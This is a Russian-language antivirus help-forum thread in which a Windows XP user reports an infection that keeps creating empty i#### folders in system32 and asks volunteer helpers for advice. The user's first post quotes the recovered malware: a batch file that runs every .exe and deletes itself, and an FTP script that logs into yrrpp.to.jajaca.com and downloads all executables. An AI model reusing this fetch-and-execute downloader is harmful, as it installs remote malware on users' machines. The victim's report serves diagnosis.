Показано с 1 по 13 из 13.

Какая-то гадость ломится на yrrpp.to.jajaca.com (заявка № 108203)

  1. #1
    Junior Member Репутация
    Регистрация
    31.08.2011
    Сообщений
    7
    Вес репутации
    24

    Какая-то гадость ломится на yrrpp.to.jajaca.com

    Работаю на win xp sp3, все обновления установлены. Также установлен последний DrWeb с брендмаузером. Доктор и его файрвол ни на что не ругаются.

    Какая-то гадость создает каталоги в папке system32. Название каталога всегда формата i####, где i - буква i, а #### - четыре произвольные цифры (пример - i5095).
    Появление каталогов вида i#### обнаружил adinf32, сами каталоги никогда не содержат файлов. Однако, Norton Unerase показывает наличие в этих каталогах двух стертых файлов. Файлы называются: D.bat и J
    Содержание D.bat:
    for %%i in (*.exe) do start %%i
    for %%i in (*.exe) do %%i
    del /f /q %0%

    Содержание J:
    open yrrpp.to.jajaca.com
    Net
    123
    mget *.exe
    bye

    AVPTool (при работе в безопасном режиме) ничего подозрительного не нашел.
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,464
    Вес репутации
    343
    Уважаемый(ая) sega72, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3

  5. #4
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    96,525
    Вес репутации
    3021
    Сделайте лог ComboFix
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  6. #5
    Junior Member Репутация
    Регистрация
    31.08.2011
    Сообщений
    7
    Вес репутации
    24
    Цитата Сообщение от Шапельский Александр Посмотреть сообщение
    сделано
    Вложения Вложения

  7. #6
    Junior Member Репутация
    Регистрация
    31.08.2011
    Сообщений
    7
    Вес репутации
    24
    Цитата Сообщение от thyrex Посмотреть сообщение
    Сделайте лог ComboFix
    сделано
    Вложения Вложения

  8. #7
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    96,525
    Вес репутации
    3021
    Что сейчас с проблемой?
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  9. #8
    Junior Member Репутация
    Регистрация
    31.08.2011
    Сообщений
    7
    Вес репутации
    24
    Цитата Сообщение от thyrex Посмотреть сообщение
    Что сейчас с проблемой?
    Комп простоял ночь, подкюченный к интернету, новых каталогов формата i#### не появилось. Жду указаний.

    Добавлено через 2 часа 23 минуты

    Combofix поместил в карантин три файла и файл реестра.
    1) Что это за файлы, то есть какие программы (или, может быть, драйвера) надо переустанавливать, чтобы система работала стабильно?
    2) Удалять ли файлы, который попали в карантин?
    3) Как называются эти вредоносные программы?
    4) Надо ли повторно запустить ComboFix?
    5) Можно ли деинсталировать ComboFix и MBAM?

    Добавлено через 3 часа 5 минут

    Цитата Сообщение от Info_bot Посмотреть сообщение
    поддержите проект.
    Проект поддержал.

    Добавлено через 1 минуту

    Кто-нибудь скажите - что дальше делать?

    Добавлено через 1 час 28 минут

    Цитата Сообщение от thyrex Посмотреть сообщение
    Что сейчас с проблемой?
    Опять появился каталог вида i#### (i5707) в папке system32 С утра был запущен только IE8 для работы с этим сайтом и пасьянс Косынка, больше ничего не делалось.
    Последний раз редактировалось sega72; 02.09.2011 в 11:36. Причина: Добавлено

  10. #9
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    96,525
    Вес репутации
    3021
    Цитата Сообщение от sega72 Посмотреть сообщение
    Опять появился каталог вида i#### (i5707) в папке system32
    Вирус лезет через дыры в системе + уязвимости MS SQL Server, если таковым пользуетесь
    Уверены, что установлены все обновления для системы?
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  11. #10
    Junior Member Репутация
    Регистрация
    31.08.2011
    Сообщений
    7
    Вес репутации
    24
    Цитата Сообщение от thyrex Посмотреть сообщение
    Вирус лезет через дыры в системе + уязвимости MS SQL Server, если таковым пользуетесь
    Уверены, что установлены все обновления для системы?
    MS SQL Server не пользуюсь.
    Установлены все обновления, только что проверил.

    Что мне делать дальше? Чем проверить систему? Или мой случай неоперабельный?
    Последний раз редактировалось sega72; 03.09.2011 в 20:34.

  12. #11
    Junior Member Репутация
    Регистрация
    31.08.2011
    Сообщений
    7
    Вес репутации
    24
    Каталоги продолжают создаваться в папке system32.

    Что мне делать дальше? Чем проверить систему? Или мой случай неоперабельный?

  13. #12
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    04.04.2008
    Сообщений
    5,972
    Вес репутации
    401
    Скачайте Kaspersky Rescue Disk, запишите образ на диск, загрузитесь с него и проверьте компьютер.
    Скачивать и записывать диск надо на чистом ПК

  14. #13
    Junior Member Репутация
    Регистрация
    31.08.2011
    Сообщений
    7
    Вес репутации
    24
    Цитата Сообщение от Шапельский Александр Посмотреть сообщение
    Скачайте Kaspersky Rescue Disk, запишите образ на диск, загрузитесь с него и проверьте компьютер.
    Скачивать и записывать диск надо на чистом ПК
    Уже делал так, еще до обращения на ваш сайт. Скачал на чистом компе, записал образ на флешку, с флешки загрузился. Ничего не нашлось.

  • Уважаемый(ая) sega72, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Ответов: 3
      Последнее сообщение: 07.12.2010, 14:33
    2. Какая-то гадость...
      От Villainus в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 31.03.2010, 19:48
    3. сидит какая-то гадость
      От VladMS в разделе Помогите!
      Ответов: 9
      Последнее сообщение: 22.02.2009, 05:58
    4. Какая-то гадость
      От berenika в разделе Помогите!
      Ответов: 11
      Последнее сообщение: 22.02.2009, 03:03
    5. Какая-то гадость
      От joniscoolkz в разделе Помогите!
      Ответов: 3
      Последнее сообщение: 21.09.2007, 09:23

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00944 seconds with 17 queries